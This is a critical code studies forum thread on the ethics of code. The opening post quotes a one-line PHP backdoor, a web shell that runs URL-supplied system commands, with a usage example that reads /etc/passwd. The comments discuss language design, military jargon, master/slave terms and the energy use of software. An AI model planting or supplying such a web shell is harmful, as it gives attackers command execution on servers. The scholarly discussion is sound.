Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Participants: Derya Akbaba * Ben Allen * Natalia-Rozalia Avlona * Kirill Azernyi * Erin Kathleen Bahl * Natasha Bajc * Lucas Bang * Tully Barnett * Ivette Bayo * Eamonn Bell * John Bell * kiki benzon * Liat Berdugo * Kathi Berens * David Berry * Jeffrey Binder * Philip Borenstein * Gregory Bringman * Sophia Brueckner * Iris Bull * Zara Burton * Evan Buswell * Ashleigh Cassemere-Stanfield * Brooke Cheng* Alm Chung * Jordan Clapper * Lia Coleman * Imani Cooper * David Cuartielles * Edward de Jong * Pierre Depaz * James Dobson * Quinn Dombrowski * Amanda Du Preez * Tristan Espinoza * Emily Esten * Meredith Finkelstein * Caitlin Fisher * Luke Fischbeck * Leonardo Flores * Laura Foster * Federica Frabetti * Jorge Franco * Dargan Frierson * Arianna Gass * Marshall Gillson * Jan Grant * Rosi Grillmair * Ben Grosser * E.L. (Eloisa) Guerrero * Yan Guo * Saksham Gupta * Juan Gutierrez * Gottfried Haider * Nabil Hassein * Chengbo He * Brian Heim * Alexis Herrera * Paul Hertz * shawné michaelain holloway * Stefka Hristova * Simon Hutchinson * Mai Ibrahim * Bryce Jackson * Matt James * Joey Jones * Masood Kamandy * Steve Klabnik * Goda Klumbyte * Rebecca Koeser * achim koh * Julia Kott * James Larkby-Lahet * Milton Laufer * Ryan Leach * Clarissa Lee * Zizi Li * Lilian Liang * Keara Lightning * Chris Lindgren * Xiao Liu * Paloma Lopez * Tina Lumbis * Ana Malagon * Allie Martin * Angelica Martinez * Alex McLean * Chandler McWilliams * Sedaghat Payam Mehdy * Chelsea Miya * Uttamasha Monjoree * Nick Montfort * Stephanie Morillo * Ronald Morrison * Anna Nacher * Maxwell Neely-Cohen * Gutierrez Nicholaus * David Nunez * Jooyoung Oh * Mace Ojala * Alexi Orchard * Steven Oscherwitz * Bomani Oseni McClendon * Kirsten Ostherr * Julia Polyck-O'Neill * Andrew Plotkin * Preeti Raghunath * Nupoor Ranade * Neha Ravella * Amit Ray * David Rieder * Omar Rizwan * Barry Rountree * Jamal Russell * Andy Rutkowski * samara sallam * Mark Sample * Zehra Sayed * Kalila Shapiro * Renee Shelby * Po-Jen Shih * Nick Silcox * Patricia Silva * Lyle Skains * Winnie Soon * Claire Stanford * Samara Hayley Steele * Morillo Stephanie * Brasanac Tea * Denise Thwaites * Yiyu Tian * Lesia Tkacz * Fereshteh Toosi * Alejandra Trejo Rodriguez * Álvaro Triana * Job van der Zwan * Frances Van Scoy * Dan Verständig * Roshan Vid * Yohanna Waliya * Sam Walkow * Kuan Wang * Laurie Waxman * Jacque Wernimont * Jessica Westbrook * Zach Whalen * Shelby Wilson * Avery J. Wiscomb * Grant Wythoff * Cy X * Hamed Yaghoobian * Katherine Ye * Jia Yu * Nikoleta Zampaki * Bret Zawilski * Jared Zeiders * Kevin Zhang * Jessica Zhou * Shuxuan Zhou

Guests: Kayla Adams * Sophia Beall * Daisy Bell * Hope Carpenter * Dimitrios Chavouzis * Esha Chekuri * Tucker Craig * Alec Fisher * Abigail Floyd * Thomas Forman * Emily Fuesler * Luke Greenwood * Jose Guaraco * Angelina Gurrola * Chandler Guzman * Max Li * Dede Louis * Caroline Macaulay * Natasha Mandi * Joseph Masters * Madeleine Page * Mahira Raihan * Emily Redler * Samuel Slattery * Lucy Smith * Tim Smith * Danielle Takahashi * Jarman Taylor * Alto Tutar * Savanna Vest * Ariana Wasret * Kristin Wong * Helen Yang * Katherine Yang * Renee Ye * Kris Yuan * Mei Zhang
Coordinated by Mark Marino (USC), Jeremy Douglass (UCSB), and Zach Mann (USC). Sponsored by the Humanities and Critical Code Studies Lab (USC), and the Digital Arts and Humanities Commons (UCSB).

Code Critique: Boundaries of Ethical Code and Coding

In thinking about ethics and code, we might first consider the different focuses of moral philosophy as meta, normative, or applied, traversing through truth value determination, Jeremy Bentham and John Stuart Mill’s arguments on utilitarianism or Immanuel Kant’s deontological declarations, or application of information, digital, technology, or code ethics.

One consideration of ethical coding is authorial intentionality of the code. Was the code written to add or remove functionality? Did the change correct logical or assumption flaws that caused unintentional outcomes – bug fixes? Was it modified to safeguard against potential security threats? Was something changed to purposely usurp control, creating a backdoor, of unwitting consumers of such code?

As Kevin Brock highlights in Rhetorical Code Studies, the code fix for Heartbleed, a security vulnerability in the OpenSSL software, was simple yet overlooked through multiple code contributions to the open source project. The fix added a few lines of code to perform two checks about the amount of data stored and expected to prevent bad actors from reading potential data not intended for them. Brock adds how activities around the security flaw “can and do…exert tremendous influence over how individuals and communities respond to and deal with the consequences of writing code” (10).

Borrowing from Stuart Power’s simple one-line PHP backdoor example from GitHub, re-shown here:

    <!-- Simple PHP Backdoor By DK (One-Liner Version) -->
    <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

We might be quick to assess the applied ethical intention of the code to be immoral or evil to some degree. While using it requires certain security measures of a server to be permissive, and it assumes a UNIX operating system based on usage example, the code provides a rudimentary method to run system commands by visiting the URL where this code might run.

Other lengthier examples of overt instances of what might be considered unethical code exists; however, examining the less obvious coding approaches, such as code and code bases in common use, as Brock highlights with OpenSSL, might lead to better design and development practices for projects with “good” intentions.

Some questions that come to mind in code examination as well as in the practice of code design and development are:

  • At what stages of design and development do we confront ethical decisions and to what scale?
  • In Ethical Programs: Hospitality and the Rhetorics of Software, James Brown states, regarding ethical predicaments and decision-making in code, “these steps are not necessarily arrived at rationally, and they are not always the result of deliberation” (5). How might we examine code or code base, reflectively, to identify pivotal moments of ethical predicaments?
  • What might be some guiding principles towards more ethical coding practices?
  • Thinking of the one-line code example, at what threshold does code transform into algorithm or agent/actor with ethical intentionality? Does it take only one line of code?
  • Regarding environmental ethics, can code be ethical or unethical based on its level of resource and power consumption? Can we write code to be more environmentally friendly?

Works Cited

Brock, Kevin. Rhetorical Code Studies: Discovering Arguments in and around Code. University of Michigan Press, 2019.
Brown, James J. Ethical Programs: Hospitality and the Rhetorics of Software. University of Michigan Press, 2015.

Comments

  • edited February 2020

    @brycejackson said:

    • At what stages of design and development do we confront ethical decisions and to what scale?

    Great question. "At every stage" might be too easy an answer. However, it strikes me that "before it begins" could be helpful.

    In the design and development of code, even when one chooses a language -- possibly before the first "authorial" line of code is intentionally written -- one is also choosing ethical frameworks. This is not to say that a language is ethical or unethical in itself: the same programming language might be used to code either robotic surgical arms or criminal ransomware. However, code language designs and their concerns are often articulated as a kind of ethics by their designers, advocates, and practitioners. Choosing a language to develop code might join a community with a shared ethos ("is it Pythonic?") but also assumes a framework of ethical decisions that are part of the language design itself, in which certain things are valued over others. To pick a few examples:

    From the Python homepage, a kind of pitch/poem:

    Python is powerful... and fast;
    plays well with others;
    runs everywhere;
    is friendly & easy to learn;
    is Open.

    From the Rust homepage:

    Rust is blazingly fast and memory-efficient:
    with no runtime or garbage collector,
    it can power performance-critical services,
    run on embedded devices,
    and easily integrate with other languages.

    From the Ruby homepage

    A dynamic, open source programming language
    with a focus on simplicity and productivity.
    It has an elegant syntax
    that is natural to read and easy to write.

    From the Java home page:

    Java Powers Our Digital World

    Java is at the heart of our digital lifestyle.
    It's the platform for launching careers,
    the exploring human-to-digital interfaces,
    architecting the world's best applications,
    and unlocking innovation everywhere—
    from garages to global organizations.

    ...and, for the example above:

    From the PHP homepage:

    PHP is a popular general-purpose scripting language
    that is especially suited to web development.
    Fast, flexible and pragmatic,
    PHP powers everything from your blog
    to the most popular websites in the world.

    Different programming languages (and language families / lineages / traditions), not just in their pitch materials but in their conception and evolution, often address ethical framing questions such as: Who are we? What does it mean to be a good programming language? How is good software made, what does it look like, and what can it do? What is bad code and bad programming? What should software never do?

    In Java, this means that you can mark a method with a stack of access and other modifiers such as private static final synchronized native void myMethod() because access control, permissions, and guarantees are extremely important to the "belt and suspenders" way that Java frames good code and good coding. From that point of view, many other languages are "unethical" by design -- although, from a Python point of view, private as a language feature might itself be in some sense "unethical" (e.g. not "Open").

  • edited February 2020

    @jeremydouglass I'd like to add another perspective.

    Jeremy Douglass wrote: Different programming languages (and language families / lineages / traditions), not just in their pitch materials but in their conception and evolution, often address ethical framing questions such as: Who are we? What does it mean to be a good programming language? How is good software made, what does it look like, and what can it do? What is bad code and bad programming? What should software never do?

    I don't see any ethical concerns addressed in any of the homepage pitches you shared. Which, by the way, were fascinating to read! But these pitches address competitive positioning, or branding. I don't see any of the pitches addressing how each language relates to issues of ethics.

    But how could a specific language be ethical by itself?
    Are there examples of languages that don't do certain expected/standard functions due to an ethical choice of the programmer? Because all code is exploitable, just like every human resource, aren't the ethical dimensions bigger than any code itself?

    I don't see code, or any of its implementations, or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying) as requiring any governance that a human life would not. I don't see code requiring a separate moral compass because I see code and it's implementations as being already embedded in any social fabric at any given time. Our ethics evolve.

    But the questions that cultures use to guide shared social contracts (do not kill, do not steal, do not violate, generosity, reciprocity, equity in redistribution, participatory decision-making, social accountability, personal responsibility) are the same questions that I would like code implementations to answer to as well.

    And I agree, every stage beginning with the problem-solving stage needs the momentum of these questions, not just implementation.

    Are these basic principles enough to navigate the nuances of our social competencies and literacies through code?

  • edited February 2020

    @patricia_s said:
    But how could a specific language be ethical by itself?
    Are there examples of languages that don't do certain functions due to an ethical choice of the programmer?

    Well, this question has been answered on another thread: Floodnet: Deliberate Error as Protest and Performance.
    See: List of Protected Domains.

  • or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying)

    That's a startling observation! I've been exposed to this term for most of my working life. If you'd asked me, I probably would've guessed that it was originally an Americanism - but it never occurred to me that it might have such macho, militaristic connotations. It was "just another piece of jargon".

    (Having said that, I fall into the camp that is hugely sympathetic to the sensitivities around other pieces of jargon - in particular, the "master/slave" distinction; it seems to me a good thing that alternative terminology is gaining traction.)

    All of which is by the by. I don't see it mentioned in previous iterations of this WG, but there's at least one toy that you might interpret as having an alternative ethical stance. Core War has a long history; it's not only grown its own language to describe strategies for competing programs ("Paper, Scissors, Stone," for instance) but it's also seen some success as a playground for program synthesis through genetic algorithms.

  • or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying)

    That's a startling observation! I've been exposed to this term for most of my working life. If you'd asked me, I probably would've guessed that it was originally an Americanism - but it never occurred to me that it might have such macho, militaristic connotations. It was "just another piece of jargon".

    (Having said that, I fall into the camp that is hugely sympathetic to the sensitivities around other pieces of jargon - in particular, the "master/slave" distinction; it seems to me a good thing that alternative terminology is gaining traction.)

    All of which is by the by. Your comment reminded me of this: I don't see it mentioned in previous iterations of this WG, but there's at least one toy that you might interpret as having an alternative ethical stance (albeit as a playground). Core War has a long history; it's not only grown its own language to describe strategies for competing programs ("Paper, Scissors, Stone," for instance) but it also saw some success as an arena for program synthesis through genetic algorithms.

  • edited February 2020

    @jang said:

    or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying)

    That's a startling observation! I've been exposed to this term for most of my working life. If you'd asked me, I probably would've guessed that it was originally an Americanism - but it never occurred to me that it might have such macho, militaristic connotations. It was "just another piece of jargon".

    >

    Hi @jang! It very well may be an Americanism. I don't know where/when people began using that term in the web world. I may have been pre-disposed to be appalled by the term, not just due to political tendencies (anti-war), but because English is not my first language, so words like that really stand out ESPECIALLY in a "creative" environment where one isn't expecting a military slippage. Yet, it's everywhere. The industries in which I've worked the most have been based around deprecated military technologies: tech, and methodologies of digital production for photo and video.

    I don't know if it's still the case, but the only free special effects packs we could get for After Effects that used to come bundled with the software were the Casino Pack and one that was for a war game. I'm not sure if that is still the case. But it's equally telling about about the intent behind the frameworks we use to make.

    How are we to think differently (as Apple posters originally impelled us to do) when we are "deploying" through these frameworks, coated with the residue of oppressive force? The frameworks we use affect our ideas so intimately, but without us thinking too much about it because, well, "that's the software".

  • edited February 2020

    So I have a question about this.

    I'd assumed that "deploy" came from the French word meaning to unfold or to spread out, and that if anything the direction of semantic travel would have been from a general notion of laying out or spreading out, to one involving military forces - but it may well be that the meaning traveled in the opposite direction. Another way to put it is that my linguistic intuitions are that we start with general meanings, and jargon (military, technical, artistic, critical) tends to find and then apply analogues.

    That may or may not be the case here; but if the speaker assumed as I did, that the terminology was originally innocent - then to what extent are they affected by such connotations, of which they are naive?

    I understand that "offense is taken, rather than given" (ie, the speaker has limited control over how a listener may interpret or be emotionally moved by their words) - and I'm not attempting to undermine that position.

    Is it the case that militaristic connotations might be "filed off" terminology, given time and the dilution of usage? (Some things - the "master/slave" terminology - are clearly still burdened with their original connotations, and to continue to insist in their use seems deliberately obtuse and mean; and that I don't dispute.) Or am I displaying a kind of colonial chauvinism in even asking this question?

    (Although I am broadly aware of the ideas of linguistic feminism - and I try to choose my words carefully - I would not describe myself as expert in them. I suppose I'm also asking if there is someone I should be reading to get better acquainted with these ideas.)

    To bring the question back to the term "deployment" in particular - I am reasonably sure that I think of the act of software deployment in the abstract, as navigating a directed graph of state changes. Is it foolish to be so convinced of my naivete?

  • RE: "deploy"

    The Online Etymology Dictionary has "deploy" coming into English from French as a military word in 1786 (I did not know that!) but also says: "Figurative use by 1829." That is almost two hundred years of figurative uses to muddy the waters.

    An interesting point of comparison is this working group's discussion of Master/Slave Replication in MySQL. "Slave" as a term in technical discourse has a longer history than MySQL, but it is much younger than "deploy": its first use in that way back can be traced back to sympathetic clocks ("master / slave clocks") run by the British Royal Astronomers in Cape Town, South Africa, first so-called in the 1904. However, for many, no history of figurative use, no matter how long, could make the word "slave" lose its sting as connected to British and American / US slavery practices. Perhaps because I'm attuned that the US context (first learning to program as a child in Atlanta, Georgia) the critique of "slave database" terminology was immediately intuitive to me.

    That said, there is a great deal of language about commanding, coordinating, and ordering-about that comes from military concepts and usage -- or the language is at least military-adjacent, even if that is not the original etymology. In data marshalling, for example, one metaphorically commands data to form up, not unlike a regiment in ranks and files. Even less ambiguous is the common networking term for a perimeter network to a LAN, a "DMZ" ("demilitarized zone").

    Another networking term is "ping." "Ping" is originally a 19th-century onomatopoeia for a bullet sound, and in the early 20th century it became the word for sound pulses made by active sonar, which was developed for military submarines. The first use of "ping" in a US patent describes it in a warfare context:

    Submarines may also be equipped with echo-ranging equipment which consists of an apparatus for sending sound pulses, or pings, into the water and for determining the time required for their echoes to return from the target. But, in warfare it is undesirable for a submarine to send out echo-ranging pings because they may be heard by other ships. ("Sonar Trainer" US2948970A)[https://patents.google.com/patent/US2948970A/en]

    Just because a word (like "ping") emerges out of a particular history does not mean that all usages of it are aware of that history or that they convey that history to listeners. Every computer scientist or gamer talking about pings is not overtly pushing a military ideology. However, sometimes on examination we can find sets of jargon that, while innocent in context, reveal a systematic set of parallel usage (marshalling, pings, DMZ-es etc as military language) that convey a general set of military metaphors for thinking about e.g. data or networks, and these would be understandable as subtext to new listeners who were familiar with parades or submarines. Then new military technical metaphors, when coined, tend to fit in with that pattern of existing language.

  • edited February 2020

    To come back to the original question list for a moment:

    • Regarding environmental ethics, can code be ethical or unethical based on its level of resource and power consumption? Can we write code to be more environmentally friendly?

    If software engineers / coders attempted to make code more power-efficient in general, and if lowered energy consumption led to lowered environmental impact in general then this could be ethical. The impacts of improved software are complicated, though -- sometimes optimized software runs on new lower energy devices, and those new devices are sold to people who then throw their slightly less energy-efficient device into a landfill -- so the net effect could be positive, or it could be that a broad push to upgrade to more efficient software triggers a wave of unnecessary pollution. Sometimes it is a mix of the two.

    One might accrue great positive karma by slightly optimizing the performance of a broadly deployed random number generator, thus averting some huge amount of coal-fired electrical consumption world-wide. Or, conversely, not bothering to optimize a sloppy background process for a widely deployed cellphone might be deeply unethical because this wasteful act is magnified across the huge number of unnecessary recharging it triggers around the globe.

    Bitcoin mining and its power consumption footprint is in this sense perhaps the closest to a caricature of the unethical in computing. When I first heard it described in detail, it reminded me of a scene from Douglas Adams' "The Restaurant at the End of the Universe" (1980) when the first space colonists to arrive on Earth immediately decide to destroy the planet in order to create imaginary wealth:

    “Since we decided a few weeks ago to adopt the leaf as legal tender, we have, of course, all become immensely rich.”

    Ford stared in disbelief at the crowd who were murmuring appreciatively at this and greedily fingering the wads of leaves with which their track suits were stuffed.

    “But we have also,” continued the management consultant, “run into a small inflation problem on account of the high level of leaf availability, which means that, I gather, the current going rate has something like three deciduous forests buying one ship’s peanut."

    Murmurs of alarm came from the crowd. The management consultant waved them down.

    “So in order to obviate this problem,” he continued, “and effectively revalue the leaf, we are about to embark on a massive defoliation campaign, and. . .er, burn down all the forests. I think you'll all agree that's a sensible move under the circumstances."

    The crowd seemed a little uncertain about this for a second or two until someone pointed out how much this would increase the value of the leaves in their pockets whereupon they let out whoops of delight and gave the management consultant a standing ovation.

  • edited February 2020

    Thanks @jeremydouglass!

    I've been following the discussion on the Master/Slave Replication in MySQL thread, but have not posted because I don't want to be off-topic. MySQL is not my expertise, but I do wonder if 'replication' in a database is relegated a perpetuity clause. The examples I keep thinking of don't have an automated perpetuity factor, for example:

    Quark Express stylesheets designated a "Master Style" by default for typefaces. When Adobe purchased Quark and it became Adobe InDesign, the language remained, but evolved. Now the default is "paragraph" and "body" and other choices. In Quark Express 3.0 I remember being able to create new stylesheets and being able to name them (captions, biblio, etc.) but before that I wonder that was possible.

    Interestingly with Photoshop: Layers weren't available until Photoshop 2.0, then still in black and white. But there wasn't a "master layer". There was only "background". The default organization of the working space was based closer to models of painting: the background is white, canvas, plain.

    When I first learned CSS, the instructor said "Master style" for what I later saw my colleagues use "main.css" instead.

    Same idea for learning lighting in photography educational departments. When you graduate to using strobe lights, there is a master (main light) and a slave (fill-in, or any other role designated).

    And then there's our cars: "Master Cylinder." "Clutch Slaves," which are stepped on (in a manual transmission, not sure if this language for automatic cars. My dad was/is a mechanic so I heard these things, I never worked on cars.)

    The "Master" bedroom.

    Once we hear "master," the analogy completes itself.

  • edited February 2020

    @jang said:

    To bring the question back to the term "deployment" in particular - I am reasonably sure that I think of the act of software deployment in the abstract, as navigating a directed graph of state changes. Is it foolish to be so convinced of my naivete?

    Where you say 'naivete' I would say 'socialized.'
    We're socialized to accept certain conditions as default positions.

    The default human measurement of safety systems (for example, seat belts in cars, airplanes, etc) are still based on the measurements of a athletic able bodied white male. Resulting in ergonomic inequities that lead to increased fatalities among drivers who are assigned female at birth.

    We're socialized to accept 'defaults."
    The naivete you mention is bigger than any single individual, in my opinion.
    But each individual has the agency to change defaults.


    The Crash Test Bias: How Male-Focused Testing Puts Female Drivers at Risk
    https://www.consumerreports.org/car-safety/crash-test-bias-how-male-focused-testing-puts-female-drivers-at-risk/

Sign In or Register to comment.